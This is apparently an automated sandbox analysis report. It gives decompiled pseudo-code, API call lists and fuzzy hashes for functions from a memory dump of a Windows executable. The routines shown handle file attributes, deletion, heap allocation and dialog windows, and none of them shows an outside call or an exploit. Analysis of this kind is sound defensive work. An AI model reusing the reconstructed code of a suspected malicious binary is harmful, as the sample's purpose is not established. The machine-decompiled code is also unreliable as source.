Part of subcall function 00419DFE: GetLastError.KERNEL32(?,00424CE6,00000004,0042DA90,0000000C,0042092E,00000000,0041A2AA,00000000,00000000,00000000,?,0041E366,00000001,00000214), ref: 00419E77

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog$ErrorFreeHeapLast___sbh_find_block___sbh_free_block__lock_wcslen
String ID:
API String ID: 2367413355-0
Opcode ID: a8539ce9a7a50aa8036892595721f3eada6a9b43cadf520b5ac843ce442c8a7a
Instruction ID: 3ba9ce16a9945071c4887c578a8d3e5d4b29fca9ddce1d957fd19e5f4cdb855b
Opcode Fuzzy Hash: a8539ce9a7a50aa8036892595721f3eada6a9b43cadf520b5ac843ce442c8a7a
Instruction Fuzzy Hash: 57219232D00219EBDF21AF99D8419EEBBB5EF08704F10402FF951B25A2C73D1952DB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040E48A, Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040E48A(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t33;
				void* _t34;
				intOrPtr _t36;
				intOrPtr _t38;
				intOrPtr _t55;
				void* _t57;
				void* _t59;
				intOrPtr _t61;
				void* _t64;

				_t64 = __eflags;
				_t54 = __edx;
				E00419DD4(E004292EC, _t59);
				_push(__ecx);
				E0041A3E0(0xb290);
				_push(_t57);
				_push(_t55);
				 *((intOrPtr*)(_t59 - 0x10)) = _t61;
				 *((intOrPtr*)(_t59 - 4)) = 0;
				E0040185E(_t59 - 0xb2a0, __edx, _t55, _t64, 0); // executed
				 *((char*)(_t59 - 4)) = 1;
				E00401A56(_t59 - 0xb2a0, __edx, _t59, _t64,  *((intOrPtr*)(_t59 + 0xc)));
				 *((intOrPtr*)(_t59 - 0x20)) = 0;
				 *((intOrPtr*)(_t59 - 0x1c)) = 0;
				 *((intOrPtr*)(_t59 - 0x18)) = 0;
				 *((intOrPtr*)(_t59 - 0x14)) = 0;
				 *((char*)(_t59 - 4)) = 2;
				_t33 = E004017A4(_t59 - 0xb2a0, _t54, _t59 - 0x20); // executed
				if(_t33 != 0) {
					_t36 =  *((intOrPtr*)(_t59 - 0x1c));
					_t57 = _t36 + _t36;
					_t55 = _t36;
					_t38 = E0041C86E(0, _t54, _t55, _t57 + 2);
					 *((intOrPtr*)( *((intOrPtr*)(_t59 + 0x10)))) = _t38;
					if(_t38 != 0) {
						__eflags = 0;
						 *((short*)(_t57 + _t38)) = 0;
						E0041BB80(0, _t55, _t57, _t38,  *((intOrPtr*)(_t59 - 0x20)), _t57);
					} else {
						_t55 = 0;
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t59 + 0x14)))) = _t55;
				}
				_t67 =  *((intOrPtr*)(_t59 - 0x20));
				if( *((intOrPtr*)(_t59 - 0x20)) != 0) {
					_push( *((intOrPtr*)(_t59 - 0x20)));
					E00419DFE(0, _t55, _t57, _t67);
				}
				 *((char*)(_t59 - 4)) = 0;
				_t34 = E00401235(_t59 - 0xb2a0, _t55);
				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
				return _t34;
			}

0x0040e48a
0x0040e48a
0x0040e48f
0x0040e494
0x0040e49a
0x0040e4a0
0x0040e4a1
0x0040e4a4
0x0040e4ae
0x0040e4b1
0x0040e4bf
0x0040e4c3
0x0040e4c8
0x0040e4cb
0x0040e4ce
0x0040e4d1
0x0040e4de
0x0040e4e2
0x0040e4e9
0x0040e4eb
0x0040e4ee
0x0040e4f1
0x0040e4f7
0x0040e500
0x0040e504
0x0040e50a
0x0040e50d
0x0040e515
0x0040e506
0x0040e506
0x0040e506
0x0040e520
0x0040e520
0x0040e522
0x0040e525
0x0040e527
0x0040e52a
0x0040e52f
0x0040e536
0x0040e539
0x0040e543
0x0040e54c

APIs

__EH_prolog.LIBCMT ref: 0040E48F

Part of subcall function 0040185E: __EH_prolog.LIBCMT ref: 00401863
Part of subcall function 0040185E: _memset.LIBCMT ref: 004019A6
Part of subcall function 0040185E: _memset.LIBCMT ref: 004019B5
Part of subcall function 0040185E: _memset.LIBCMT ref: 004019C4

Part of subcall function 004017A4: __EH_prolog.LIBCMT ref: 004017A9

_malloc.LIBCMT ref: 0040E4F7

Part of subcall function 0041C86E: __FF_MSGBANNER.LIBCMT ref: 0041C891
Part of subcall function 0041C86E: __NMSG_WRITE.LIBCMT ref: 0041C898
Part of subcall function 0041C86E: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004208E4,00000000,00000001,00000000,?,0041E92D,00000018,0042D8F0,0000000C,0041E9BE), ref: 0041C8E5

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog_memset$AllocateHeap_malloc
String ID:
API String ID: 47157355-0
Opcode ID: 07912b6852f95a25fd9a5c3c31039daf1556ff5dcab8f920a59bee3ef567a61d
Instruction ID: 38c6252e6e847d0957af7d2c37c14d1737c8cf02eceb3806c55729336653e8a8
Opcode Fuzzy Hash: 07912b6852f95a25fd9a5c3c31039daf1556ff5dcab8f920a59bee3ef567a61d
Instruction Fuzzy Hash: 3C211075900219AFCF11EF96D8819DEB778BF49308F50486FE406B3291EB385A45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00408CCC, Relevance: 3.0, APIs: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00408CCC(intOrPtr* __ecx, long _a4, long _a8, signed int _a12) {
				long _v8;
				void* __ebp;
				void* _t16;
				long _t20;
				void* _t22;
				void* _t25;
				long _t27;
				intOrPtr* _t30;
				long _t33;

				_t24 = __ecx;
				_push(__ecx);
				_t30 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0xffffffff) {
					L12:
					_t16 = 1;
				} else {
					_t27 = _a8;
					_t33 = _t27;
					if(_t33 <= 0 && (_t33 < 0 || _a4 < 0) && _a12 != 0) {
						if(_a12 != 1) {
							_t22 = E00408B84(_t24, _t25);
						} else {
							_t22 =  *((intOrPtr*)( *_t30 + 0x10))();
						}
						_a4 = _a4 + _t22;
						asm("adc edi, edx");
						_a12 = _a12 & 0x00000000;
					}
					_v8 = _t27;
					_t20 = SetFilePointer( *(_t30 + 4), _a4,  &_v8, _a12); // executed
					if(_t20 != 0xffffffff || GetLastError() == 0) {
						goto L12;
					} else {
						_t16 = 0;
					}
				}
				return _t16;
			}

0x00408ccc
0x00408ccf
0x00408cd1
0x00408cd7
0x00408d39
0x00408d39
0x00408cd9
0x00408cda
0x00408cdd
0x00408cdf
0x00408cf3
0x00408cfc
0x00408cf5
0x00408cf7
0x00408cf7
0x00408d01
0x00408d04
0x00408d06
0x00408d06
0x00408d19
0x00408d1f
0x00408d29
0x00000000
0x00408d35
0x00408d35
0x00408d35
0x00408d29
0x00408d3d

APIs

SetFilePointer.KERNELBASE(000000FF,?,000000FF,?), ref: 00408D1F
GetLastError.KERNEL32 ref: 00408D2B

Part of subcall function 00408B84: __EH_prolog.LIBCMT ref: 00408B89

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileH_prologLastPointer
String ID:
API String ID: 4236474358-0
Opcode ID: cbcc403c36e2b498df8bc83e16041fac02a248d6bd5bb4e195160361298c099f
Instruction ID: 786fe9c5832d224f0102e6cb5a537e3c50784b223292a83889cf56b0253cf8f4
Opcode Fuzzy Hash: cbcc403c36e2b498df8bc83e16041fac02a248d6bd5bb4e195160361298c099f
Instruction Fuzzy Hash: D401C031100304EBCB208F14DA0479A37A4BF61365F104B3FE8A1A22D0CBB9D951DA58

Uniqueness

Uniqueness Score: -1.00%

Function 0041A18A, Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0041A18A(void* __ebx, void* __edx, void* __edi, void* __eflags, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v0;
				char _v16;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t39;
				signed int _t40;
				signed int _t46;
				void* _t51;
				void* _t53;
				intOrPtr* _t56;
				intOrPtr* _t58;
				void* _t62;
				void* _t74;
				void* _t75;
				signed int _t76;
				signed int _t79;

				_t75 = __edi;
				_t74 = __edx;
				_t62 = __ebx;
				while(1) {
					_t39 = E0041C86E(_t62, _t74, _t75, _a4); // executed
					if(_t39 != 0) {
						break;
					}
					_t40 = E0041F69B(_a4);
					__eflags = _t40;
					if(_t40 == 0) {
						__eflags =  *0x44ecc8 & 0x00000001;
						if(( *0x44ecc8 & 0x00000001) == 0) {
							 *0x44ecc8 =  *0x44ecc8 | 0x00000001;
							__eflags =  *0x44ecc8;
							E00411C9C(0x44ecbc);
							E0041C1D6( *0x44ecc8, 0x42953f);
						}
						E0041212C( &_v16, 0x44ecbc);
						E0041C1ED( &_v16, 0x42d4c4);
						asm("int3");
						_push(_t62);
						__eflags = _v0;
						if(__eflags != 0) {
							_push(0x44ecbc);
							_t79 = _a4;
							_push(_t75);
							_t76 = _a8;
							__eflags = _t76;
							if(_t76 == 0) {
								L12:
								_v28 = 0x42;
								_v32 = _t79;
								_v40 = _t79;
								__eflags = _t76 - 0x3fffffff;
								if(_t76 <= 0x3fffffff) {
									_v36 = _t76 + _t76;
								} else {
									_v36 = 0x7fffffff;
								}
								_t46 = _v0( &_v40, _a12, _a16, _a20);
								_a12 = _t46;
								__eflags = _t79;
								if(_t79 != 0) {
									__eflags = _t46;
									if(_t46 < 0) {
										L24:
										__eflags = _v36;
										 *((short*)(_t79 + _t76 * 2 - 2)) = 0;
										_t46 = 0 | _v36 >= 0x00000000;
										__eflags = _t46;
									} else {
										_t22 =  &_v36;
										 *_t22 = _v36 - 1;
										__eflags =  *_t22;
										if( *_t22 < 0) {
											_t51 = E0041F868(_t74, _t76, 0,  &_v40);
											__eflags = _t51 - 0xffffffff;
											if(_t51 == 0xffffffff) {
												goto L24;
											} else {
												goto L20;
											}
										} else {
											 *_v40 = 0;
											_v40 = _v40 + 1;
											L20:
											_t28 =  &_v36;
											 *_t28 = _v36 - 1;
											__eflags =  *_t28;
											if( *_t28 < 0) {
												_t53 = E0041F868(_t74, _t76, 0,  &_v40);
												__eflags = _t53 - 0xffffffff;
												if(_t53 == 0xffffffff) {
													goto L24;
												} else {
													goto L23;
												}
											} else {
												 *_v40 = 0;
												L23:
												_t46 = _a12;
											}
										}
									}
								}
							} else {
								__eflags = _t79;
								if(__eflags != 0) {
									goto L12;
								} else {
									_t56 = E0041E7AE(__eflags);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									 *_t56 = 0x16;
									_t46 = E0041FB03(_t74, _t76, _t79) | 0xffffffff;
								}
							}
						} else {
							_t58 = E0041E7AE(__eflags);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							 *_t58 = 0x16;
							_t46 = E0041FB03(_t74, _t75, 0x44ecbc) | 0xffffffff;
						}
						return _t46;
					} else {
						continue;
					}
					L27:
				}
				return _t39;
				goto L27;
			}

0x0041a18a
0x0041a18a
0x0041a18a
0x0041a1a1
0x0041a1a4
0x0041a1ac
0x00000000
0x00000000
0x0041a197
0x0041a19d
0x0041a19f
0x0041a1b0
0x0041a1bc
0x0041a1be
0x0041a1be
0x0041a1c7
0x0041a1d1
0x0041a1d6
0x0041a1db
0x0041a1e9
0x0041a1ee
0x0041a1f7
0x0041a1fa
0x0041a1fd
0x0041a21f
0x0041a220
0x0041a223
0x0041a224
0x0041a227
0x0041a229
0x0041a24f
0x0041a24f
0x0041a256
0x0041a259
0x0041a25c
0x0041a262
0x0041a270
0x0041a264
0x0041a264
0x0041a264
0x0041a280
0x0041a286
0x0041a289
0x0041a28b
0x0041a28d
0x0041a28f
0x0041a2d3
0x0041a2d5
0x0041a2d8
0x0041a2e1
0x0041a2e1
0x0041a291
0x0041a291
0x0041a291
0x0041a291
0x0041a294
0x0041a2a5
0x0041a2ac
0x0041a2af
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a296
0x0041a299
0x0041a29b
0x0041a2b1
0x0041a2b1
0x0041a2b1
0x0041a2b1
0x0041a2b4
0x0041a2c2
0x0041a2c9
0x0041a2cc
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a2b6
0x0041a2b9
0x0041a2ce
0x0041a2ce
0x0041a2ce
0x0041a2b4
0x0041a294
0x0041a28f
0x0041a22b
0x0041a22b
0x0041a22d
0x00000000
0x0041a22f
0x0041a22f
0x0041a234
0x0041a235
0x0041a236
0x0041a237
0x0041a238
0x0041a239
0x0041a247
0x0041a247
0x0041a22d
0x0041a1ff
0x0041a1ff
0x0041a204
0x0041a205
0x0041a206
0x0041a207
0x0041a208
0x0041a209
0x0041a217
0x0041a217
0x0041a2e6
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a19f
0x0041a1af
0x00000000

APIs

_malloc.LIBCMT ref: 0041A1A4

Part of subcall function 0041C86E: __FF_MSGBANNER.LIBCMT ref: 0041C891
Part of subcall function 0041C86E: __NMSG_WRITE.LIBCMT ref: 0041C898
Part of subcall function 0041C86E: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004208E4,00000000,00000001,00000000,?,0041E92D,00000018,0042D8F0,0000000C,0041E9BE), ref: 0041C8E5

__CxxThrowException@8.LIBCMT ref: 0041A1E9

Part of subcall function 00411C9C: std::exception::exception.LIBCMT ref: 00411CA6

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::exception::exception
String ID:
API String ID: 1264268182-0
Opcode ID: 43045ccaa593694f682bf45ac59199d741f1189d92fa7b186a6fad2a13b36f3a
Instruction ID: 5d6abae2db10d607b89ef978a951b00dead215c6a4c98fde2db9ade978eba56b
Opcode Fuzzy Hash: 43045ccaa593694f682bf45ac59199d741f1189d92fa7b186a6fad2a13b36f3a
Instruction Fuzzy Hash: 54F0E23568020436EB057723EC86ADE3B64AB01758F60003FFC18961D3DE6CAAD5815E

Uniqueness

Uniqueness Score: -1.00%

Function 00408E0E, Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408E0E(WCHAR* _a4, long _a8) {
				short _v4100;
				int _t13;
				signed int _t19;
				signed int _t20;

				E0041A3E0(0x1000);
				_t13 = SetFileAttributesW(_a4, _a8); // executed
				_t20 = _t19 & 0xffffff00 | _t13 != 0x00000000;
				if(_t20 == 0 && E0040A582(_a4,  &_v4100, 0x800) != 0) {
					_t20 = _t20 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
				}
				return _t20;
			}

0x00408e16
0x00408e29
0x00408e2d
0x00408e32
0x00408e5a
0x00408e5a
0x00408e62

APIs

SetFileAttributesW.KERNELBASE(?,00000000,73BCF790,00000001,?,004090A9,?,?,?,?,?,0040918C,?,00000001,00000000,?), ref: 00408E29
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,004090A9,?,?,?,?,?,0040918C,?,00000001,00000000), ref: 00408E56

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 553c54dcd16de2184bba0312f3abe532f7f70e103d42d1d66629d6ef7d41f2e0
Instruction ID: a3008f894dd7ae2b165e24c1c842e11cc2d6014be6e8fb2b4d49ef7ddbcde70e
Opcode Fuzzy Hash: 553c54dcd16de2184bba0312f3abe532f7f70e103d42d1d66629d6ef7d41f2e0
Instruction Fuzzy Hash: 06F0A03124122DBBDF016E60CC01FDA3B5CAF057D4F088437BD84A7290DA75DDA59AA4

Uniqueness

Uniqueness Score: -1.00%

Function 00408E65, Relevance: 3.0, APIs: 2, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408E65(WCHAR* _a4) {
				short _v4100;
				int _t11;
				signed int _t17;
				signed int _t18;

				E0041A3E0(0x1000);
				_t11 = DeleteFileW(_a4); // executed
				_t18 = _t17 & 0xffffff00 | _t11 != 0x00000000;
				if(_t18 == 0 && E0040A582(_a4,  &_v4100, 0x800) != 0) {
					_t18 = _t18 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
				}
				return _t18;
			}

0x00408e6d
0x00408e7d
0x00408e81
0x00408e86
0x00408eab
0x00408eab
0x00408eb3

APIs

DeleteFileW.KERNELBASE(?,?,-00000009,?,0040852C,?,?,00000001,?,?,?,?,?,?,?,00000000), ref: 00408E7D
DeleteFileW.KERNEL32(?,?,?,00000800,?,0040852C,?,?,00000001,?,?,?,?,?,?,?), ref: 00408EA7

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 82c5a823a6341c6b51ba7457c3f64fd7307bc541740eac8e83d1d200cfbe8996
Instruction ID: b37159ec02276fecf1636934a09f1ef2b437b761eeb12d2c3f2a6dd23a0d76f5
Opcode Fuzzy Hash: 82c5a823a6341c6b51ba7457c3f64fd7307bc541740eac8e83d1d200cfbe8996
Instruction Fuzzy Hash: 03E0E53114122966DB005B60CC01BDA3B5C6B047D0F0440737C80E3290DB75ED918AA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040DAEC, Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0040DB1A
SetDlgItemTextW.USER32 ref: 0040DB31

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemText_swprintf
String ID:
API String ID: 3011073432-0
Opcode ID: 1a978a4f7e4380c5c223b419bb9eb0874979eaf56b1bb087519047eda97d829a
Instruction ID: a38c93078397fe7b1c26feb90d1b9c113b3e4b6b1d23256d6774111bafeabb8e
Opcode Fuzzy Hash: 1a978a4f7e4380c5c223b419bb9eb0874979eaf56b1bb087519047eda97d829a
Instruction Fuzzy Hash: 80F0EC31A40348F6E711F7A18C46F9E3B589B05789F0401777701B60E2D579B564876E

Uniqueness

Uniqueness Score: -1.00%

Function 00408DC2, Relevance: 3.0, APIs: 2, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408DC2(WCHAR* _a4) {
				short _v4100;
				long _t7;
				long _t12;
				long _t13;

				E0041A3E0(0x1000);
				_t7 = GetFileAttributesW(_a4); // executed
				_t13 = _t7;
				if(_t13 == 0xffffffff && E0040A582(_a4,  &_v4100, 0x800) != 0) {
					_t12 = GetFileAttributesW( &_v4100); // executed
					_t13 = _t12;
				}
				return _t13;
			}

0x00408dca
0x00408dda
0x00408ddc
0x00408de1
0x00408e02
0x00408e04
0x00408e04
0x00408e0b

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,0040902F,?,0040658A,?,?,?,?), ref: 00408DDA
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,?,0040902F,?,0040658A,?,?,?,?), ref: 00408E02

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 242aa4340361d3e0a93a3a561c34a2f4322779437d0a742b347223c1eb284879
Instruction ID: bce923dd10af3d1a5cfb315eeb7f4156ea5a0626722ddd2990660de613ddd026
Opcode Fuzzy Hash: 242aa4340361d3e0a93a3a561c34a2f4322779437d0a742b347223c1eb284879
Instruction Fuzzy Hash: E8E0923260021867CB10AA69CC01BDE379DAB893E5F040577BA55F32D0DAB4DE958BE5

Uniqueness

Uniqueness Score: -1.00%

Function 00410AE6, Relevance: 3.0, APIs: 2, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410AE6(void* __ecx) {
				long _v8;
				long _v12;
				int _t8;
				void* _t11;
				signed int _t14;

				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
				if(_t8 == 0) {
					L6:
					return 1;
				}
				_t11 = 0;
				_t14 = 1;
				do {
					if((_v8 & _t14) != 0) {
						_t11 = _t11 + 1;
					}
					_t14 = _t14 + _t14;
				} while (_t14 != 0);
				if(_t11 < 1) {
					goto L6;
				}
				return _t11;
			}

0x00410afa
0x00410b02
0x00410b18
0x00000000
0x00410b1a
0x00410b06
0x00410b08
0x00410b09
0x00410b0c
0x00410b0e
0x00410b0e
0x00410b0f
0x00410b0f
0x00410b16
0x00000000
0x00000000
0x00410b1c

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00410AF3
GetProcessAffinityMask.KERNEL32(00000000), ref: 00410AFA

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 1f30c96a95d69cf8b4a3dd63c309325e2cc17b6181a82d166121b0b66707cd4e
Instruction ID: 21cb658200e69f047239caca7d82941d4c1085c081a72f1e0f1f5584e968a350
Opcode Fuzzy Hash: 1f30c96a95d69cf8b4a3dd63c309325e2cc17b6181a82d166121b0b66707cd4e
Instruction Fuzzy Hash: 8DE08672B1420AA78F1C9BF0DD498EF32ACEB01209710057FE503D2200EAB8E6C28669

Uniqueness

Uniqueness Score: -1.00%

Function 004199B2, Relevance: 3.0, APIs: 2, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004199B2() {
				struct HINSTANCE__* _t3;
				intOrPtr* _t4;
				struct HINSTANCE__** _t9;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = _t9;
				_t3 =  *_t14;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
				}
				_t15 = _t14[1];
				if(_t15 != 0) {
					FreeLibrary(_t15);
				}
				_t4 =  *0x44ecb8; // 0x73e7c100
				 *((intOrPtr*)( *_t4 + 8))(_t4);
				return __imp__OleUninitialize();
			}

0x004199b3
0x004199b5
0x004199c0
0x004199c3
0x004199c3
0x004199c5
0x004199ca
0x004199cd
0x004199cd
0x004199cf
0x004199d7
0x004199dc

APIs

FreeLibrary.KERNELBASE(00000000,00000000,00438CD8,0040FCC6), ref: 004199C3
FreeLibrary.KERNELBASE(?,00000000,00438CD8,0040FCC6), ref: 004199CD

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: a90e627ef978791dfe21374f3848f7109ee2ff10ba5c486e49d734be457f12fb
Instruction ID: 49c796d7c8091c8dfb6425e577b7fd6bc19dcf57291dbc53d6b78c49f94a8c41
Opcode Fuzzy Hash: a90e627ef978791dfe21374f3848f7109ee2ff10ba5c486e49d734be457f12fb
Instruction Fuzzy Hash: E4E0E6757011109B86219F5DDC44996F3ACAF89711315046AE804D3310C774EC418A99

Uniqueness

Uniqueness Score: -1.00%

Function 00406031, Relevance: 3.0, APIs: 2, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00406031(struct HWND__* _a4, int _a8, signed char _a12) {
				int _t8;

				asm("sbb eax, eax");
				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
				return _t8;
			}

0x00406038
0x0040604d
0x00406053

APIs

GetDlgItem.USER32 ref: 00406046
ShowWindow.USER32(00000000), ref: 0040604D

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 19294f8aa45a2ec6e0fafcf3da6bc6410b371a68fcaf4365e9f986673067b0f7
Instruction ID: c2b93edfba640bf7290b63ff50fee3d5535fa480b2e6359b7f6ff07ff928c099
Opcode Fuzzy Hash: 19294f8aa45a2ec6e0fafcf3da6bc6410b371a68fcaf4365e9f986673067b0f7
Instruction Fuzzy Hash: CFC01232158100FFCB410B70DC09C2A7BA89B94211F00C954B4A5C1160C339C020DB33

Uniqueness

Uniqueness Score: -1.00%

Function 00406013, Relevance: 3.0, APIs: 2, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406013(struct HWND__* _a4, int _a8, signed char _a12) {
				int _t6;

				_t6 = EnableWindow(GetDlgItem(_a4, _a8), _a12 & 0x000000ff); // executed
				return _t6;
			}

0x00406028
0x0040602e

APIs

GetDlgItem.USER32 ref: 00406021
KiUserCallbackDispatcher.NTDLL(00000000), ref: 00406028

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
